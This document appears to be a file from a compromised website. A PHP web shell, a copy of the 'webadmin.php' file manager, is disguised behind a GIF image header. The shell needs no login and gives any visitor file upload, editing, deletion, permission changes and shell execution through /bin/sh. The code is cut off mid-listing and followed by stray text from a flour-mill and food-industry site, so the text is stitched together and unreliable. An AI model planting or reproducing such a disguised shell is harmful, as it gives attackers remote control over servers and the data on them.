aaaaaaaaaaaa |
 |
GIF89aP;
/*
* webadmin.php - a simple Web-based file manager
* Copyright (C) 2004 Daniel Wacker * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * * ------------------------------------------------------------------------- * While using this script, do NOT navigate with your browser's back and * forward buttons! Always open files in a new browser tab! * ------------------------------------------------------------------------- * * This is Version 0.9, revision 9 * ========================================================================= * * Changes of revision 9 * * added workaround for directory listing, if lstat() is disabled * fixed permisson of uploaded files (thanks to Stephan Duffner) * * Changes of revision 8 * * added Turkish translation * * added Czech translation * * improved charset handling * * Changes of revision 7 * * added Spanish translation * * added Danish translation * * improved rename dialog * * Changes of revision 6 * * added Dutch translation * * Changes of revision 5 * * added language auto select * fixed symlinks in directory listing * removed word-wrap in edit textarea * * Changes of revision 4 * * added French translation * * added Swedish translation * * Changes of revision 3 * * improved Italian translation * * Changes of revision 2 * * got images work in some old browsers * fixed creation of directories * fixed files deletion * improved path handling * added missing word 'not_created' * * improved human readability of file sizes * * added Italian translation * * Changes of revision 1 * * webadmin.php completely rewritten: * - clean XHTML/CSS output * - several files selectable * - support for windows servers * - no more treeview, because * - webadmin.php is a >simple< file manager * - performance problems (too much additional code) * - I don't like: frames, java-script, to reload after every treeview-click * - execution of shell scripts * - introduced revision numbers * /* ------------------------------------------------------------------------- */ /* Your language: * 'en' - English * 'de' - German * 'fr' - French * 'it' - Italian * 'nl' - Dutch * 'se' - Swedish * 'sp' - Spanish * 'dk' - Danish * 'tr' - Turkish * 'cs' - Czech * 'auto' - autoselect */ $lang = 'auto'; /* Charset of output: * possible values are described in the charset table at * http://www.php.net/manual/en/function.htmlentities.php * 'auto' - use the same charset as the words of my language are encoded */ $site_charset = 'auto'; /* Homedir: * For example: './' - the script's directory */ $homedir = './'; /* Size of the edit textarea */ $editcols = 80; $editrows = 25; /* ------------------------------------------- * Optional configuration (remove # to enable) */ /* Permission of created directories: * For example: 0705 would be 'drwx---r-x'. */ # $dirpermission = 0705; /* Permission of created files: * For example: 0604 would be '-rw----r--'. */ # $filepermission = 0604; /* Filenames related to the apache web server: */ $htaccess = '.htaccess'; $htpasswd = '.htpasswd'; /* ------------------------------------------------------------------------- */ if (get_magic_quotes_gpc()) { array_walk($_GET, 'strip'); array_walk($_POST, 'strip'); array_walk($_REQUEST, 'strip'); } if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif'); die(getimage($_GET['image'])); } if (!function_exists('lstat')) { function lstat ($filename) { return stat($filename); } } $delim = DIRECTORY_SEPARATOR; if (function_exists('php_uname')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; } else { $win = ($delim == '\\') ? true : false; } if (!empty($_SERVER['PATH_TRANSLATED'])) { $scriptdir = dirname($_SERVER['PATH_TRANSLATED']); } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) { $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']); } elseif (function_exists('getcwd')) { $scriptdir = getcwd(); } else { $scriptdir = '.'; } $homedir = relative2absolute($homedir, $scriptdir); $dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir; if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) { $dir = relative2absolute($dir, $_POST['olddir']); } $directory = simplify_path(addslash($dir)); $files = array(); $action = ''; if (!empty($_POST['submit_all'])) { $action = $_POST['action_all']; for ($i = 0; $i < $_POST['num']; $i++) { if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') { $files[] = $_POST["file$i"]; } } } elseif (!empty($_REQUEST['action'])) { $action = $_REQUEST['action']; $files[] = relative2absolute($_REQUEST['file'], $directory); } elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) { $files[] = $_FILES['upload']; $action = 'upload'; } elseif (array_key_exists('num', $_POST)) { for ($i = 0; $i < $_POST['num']; $i++) { if (array_key_exists("submit$i", $_POST)) break; } if ($i < $_POST['num']) { $action = $_POST["action$i"]; $files[] = $_POST["file$i"]; } } if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) { $files[] = relative2absolute($_POST['create_name'], $directory); switch ($_POST['create_type']) { case 'directory': $action = 'create_directory'; break; case 'file': $action = 'create_file'; } } if (sizeof($files) == 0) $action = ''; else $file = reset($files); if ($lang == 'auto') { if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) { $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); } else { $lang = 'en'; } } $words = getwords($lang); if ($site_charset == 'auto') { $site_charset = $word_charset; } $cols = ($win) ? 4 : 7; if (!isset($dirpermission)) { $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755; } if (!isset($filepermission)) { $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644; } if (!empty($_SERVER['SCRIPT_NAME'])) { $self = html(basename($_SERVER['SCRIPT_NAME'])); } elseif (!empty($_SERVER['PHP_SELF'])) { $self = html(basename($_SERVER['PHP_SELF'])); } else { $self = ''; } if (!empty($_SERVER['SERVER_SOFTWARE'])) { if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') { $apache = true; } else { $apache = false; } } else { $apache = true; } switch ($action) { case 'view': if (is_script($file)) { /* highlight_file is a mess! */ ob_start(); highlight_file($file); $src = ereg_replace('', '', ob_get_contents()); $src = str_replace(array('', "\r", "\n"), array('', '', ''), $src); ob_end_clean(); html_header(); echo '
' . html($file) . '
';
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
echo '
|
' . $src . ' | '; html_footer(); } else { header('Content-Type: ' . getmimetype($file)); header('Content-Disposition: filename=' . basename($file)); readfile($file); } break; case 'download': header('Pragma: public'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Content-Type: ' . getmimetype($file)); header('Content-Disposition: attachment; filename=' . basename($file) . ';'); header('Content-Length: ' . filesize($file)); readfile($file); break; case 'upload': $dest = relative2absolute($file['name'], $directory); if (@file_exists($dest)) { listing_page(error('already_exists', $dest)); } elseif (@move_uploaded_file($file['tmp_name'], $dest)) { @chmod($dest, $filepermission); listing_page(notice('uploaded', $file['name'])); } else { listing_page(error('not_uploaded', $file['name'])); } break; case 'create_directory': if (@file_exists($file)) { listing_page(error('already_exists', $file)); } else { $old = @umask(0777 & ~$dirpermission); if (@mkdir($file, $dirpermission)) { listing_page(notice('created', $file)); } else { listing_page(error('not_created', $file)); } @umask($old); } break; case 'create_file': if (@file_exists($file)) { listing_page(error('already_exists', $file)); } else { $old = @umask(0777 & ~$filepermission); if (@touch($file)) { edit($file); } else { listing_page(error('not_created', $file)); } @umask($old); } break; case 'execute': chdir(dirname($file)); $output = array(); $retval = 0; exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval); $error = ($retval == 0) ? false : true; if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>'); if ($error) { listing_page(error('not_executed', $file, implode("\n", $output))); } else { listing_page(notice('executed', $file, implode("\n", $output))); } break; case 'delete': if (!empty($_POST['no'])) { listing_page(); } elseif (!empty($_POST['yes'])) { $failure = array(); $success = array(); foreach ($files as $file) { if (del($file)) { $success[] = $file; } else { $failure[] = $file; } } $message = ''; if (sizeof($failure) > 0) { $message = error('not_deleted', implode("\n", $failure)); } if (sizeof($success) > 0) { $message .= notice('deleted', implode("\n", $success)); } listing_page($message); } else { html_header(); echo '
'; html_footer(); } break; case 'rename': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); if (!@file_exists($dest) && @rename($file, $dest)) { listing_page(notice('renamed', $file, $dest)); } else { listing_page(error('not_renamed', $file, $dest)); } } else { $name = basename($file); html_header(); echo '
'; html_footer(); } break; case 'move': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); $failure = array(); $success = array(); foreach ($files as $file) { $filename = substr($file, strlen($directory)); $d = $dest . $filename; if (!@file_exists($d) && @rename($file, $d)) { $success[] = $file; } else { $failure[] = $file; } } $message = ''; if (sizeof($failure) > 0) { $message = error('not_moved', implode("\n", $failure), $dest); } if (sizeof($success) > 0) { $message .= notice('moved', implode("\n", $success), $dest); } listing_page($message); } else { html_header(); echo '
'; html_footer(); } break; case 'copy': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); if (@is_dir($dest)) { $failure = array(); $success = array(); foreach ($files as $file) { $filename = substr($file, strlen($directory)); $d = addslash($dest) . $filename; if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) { $success[] = $file; } else { $failure[] = $file; } } $message = ''; if (sizeof($failure) > 0) { $message = error('not_copied', implode("\n", $failure), $dest); } if (sizeof($success) > 0) { $message .= notice('copied', implode("\n", $success), $dest); } listing_page($message); } else { if (!@file_exists($dest) && @copy($file, $dest)) { listing_page(notice('copied', $file, $dest)); } else { listing_page(error('not_copied', $file, $dest)); } } } else { html_header(); echo '
'; html_footer(); } break; case 'create_symlink': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); if (substr($dest, -1, 1) == $delim) $dest .= basename($file); if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file); if (!@file_exists($dest) && @symlink($file, $dest)) { listing_page(notice('symlinked', $file, $dest)); } else { listing_page(error('not_symlinked', $file, $dest)); } } else { html_header(); echo '
'; html_footer(); } break; case 'edit': if (!empty($_POST['save'])) { $content = str_replace("\r\n", "\n", $_POST['content']); if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) { listing_page(notice('saved', $file)); } else { listing_page(error('not_saved', $file)); } } else { if (@is_readable($file) && @is_writable($file)) { edit($file); } else { listing_page(error('not_edited', $file)); } } break; case 'permission': if (!empty($_POST['set'])) { $mode = 0; if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100; if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010; if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001; if (@chmod($file, $mode)) { listing_page(notice('permission_set', $file, decoct($mode))); } else { listing_page(error('permission_not_set', $file, decoct($mode))); } } else { html_header(); $mode = fileperms($file); echo '
|
|
|
Flour Mill
|
|
Pasta & food industries |
|
Concentrate & food industries |
|
|
| |